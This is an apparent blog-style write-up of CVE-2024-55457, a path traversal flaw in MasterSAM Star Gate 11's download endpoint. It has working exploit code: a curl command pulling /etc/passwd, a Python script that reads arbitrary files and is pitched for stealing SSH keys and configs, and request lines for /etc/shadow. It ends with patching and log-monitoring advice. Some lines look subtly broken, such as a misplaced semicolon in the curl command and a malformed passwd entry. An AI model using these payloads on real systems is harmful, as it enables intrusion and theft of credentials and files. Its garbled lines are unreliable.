CVE-2024-55457 - MasterSAM Star Gate 11 Vulnerable to Directory Traversal via /adama/adama/downloadService (Exploit & Analysis)

In June 2024, a critical directory traversal vulnerability was discovered in MasterSAM Star Gate 11, a popular web-based access management solution. Tracked as CVE-2024-55457, this weakness lets attackers read arbitrary files from the server by manipulating the file parameter in the /adama/adama/downloadService endpoint. This article explains the bug, shows exploit code, and discusses the risk, all in plain and easy-to-understand language.

What’s MasterSAM Star Gate 11?

MasterSAM Star Gate is widely used by organizations to manage access, monitor users, and secure privileged accounts. Its web interface is typically exposed to internal networks or (worryingly) sometimes to the internet.

What’s Directory Traversal?

A directory traversal (or path traversal) bug lets attackers trick a web app into showing files it shouldn’t. This is done by inserting special path strings like ../ ("go up one directory") in file paths sent to the system.

How Does It Work in Star Gate 11?

MasterSAM’s /adama/adama/downloadService endpoint lets users download files by specifying a file parameter. However, it does not properly block the use of ../ (dot-dot-slash) in requested file paths. That means attackers can jump out of the allowed folder and download files anywhere on the system.

Exploitation Scenario

- Attacker finds MasterSAM Star Gate login page (typically at https://target/adama/).
- They access the vulnerable endpoint: /adama/adama/downloadService.

By changing the file parameter, they can request any file!

Here’s a code example using curl and Python.

Exploit with Curl

curl -k "https://victim-adama-site.com/adama/adama/downloadService?file=../../../../../../etc/passwd"; -o passwd.txt

What happens?

If not blocked, you get the server’s UNIX password file saved as passwd.txt

root:x:::root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Exploit with Python

import requests

target = "https://victim-adama-site.com";
vuln_path = "/adama/adama/downloadService"
payload = "../../../../../../windows/win.ini"

url = f"{target}{vuln_path}?file={payload}"

response = requests.get(url, verify=False)
if response.ok:
    print("[+] File found!")
    print(response.text)
else:
    print("[-] Not found or blocked.")

You can change payload to target any file (e.g., configuration files, SSH keys, databases).

Risk & Impact

- Full server compromise: Sensitive data like configuration files, passwords, backups, application keys, or internal documentation could be stolen.

Regulatory risks: Leaking certain files may breach compliance (GDPR, HIPAA, etc.).

- Persistence: Attackers could learn enough about the environment to launch further attacks (like uploading web shells).

If you operate MasterSAM Star Gate 11

- Update/patch immediately: Contact MasterSAM support to get the latest security fixes.

Server hardening: Use file system permissions to limit what web applications can access.

- Monitor logs: Watch for suspicious requests to /adama/adama/downloadService.

Check your web/application logs for suspicious downloads

GET /adama/adama/downloadService?file=../../../../../../etc/shadow
GET /adama/adama/downloadService?file=../../../../../../windows/win.ini

References

- NVD Entry for CVE-2024-55457 *(available soon)*
- Original Vendor
- OWASP Directory Traversal

Conclusion

CVE-2024-55457 is a dangerous vulnerability because it can be exploited easily and may reveal highly sensitive files. If you use MasterSAM Star Gate 11, act quickly to protect your system!

Timeline

Published on: 02/20/2025 18:15:25 UTC
Last modified on: 02/20/2025 20:15:46 UTC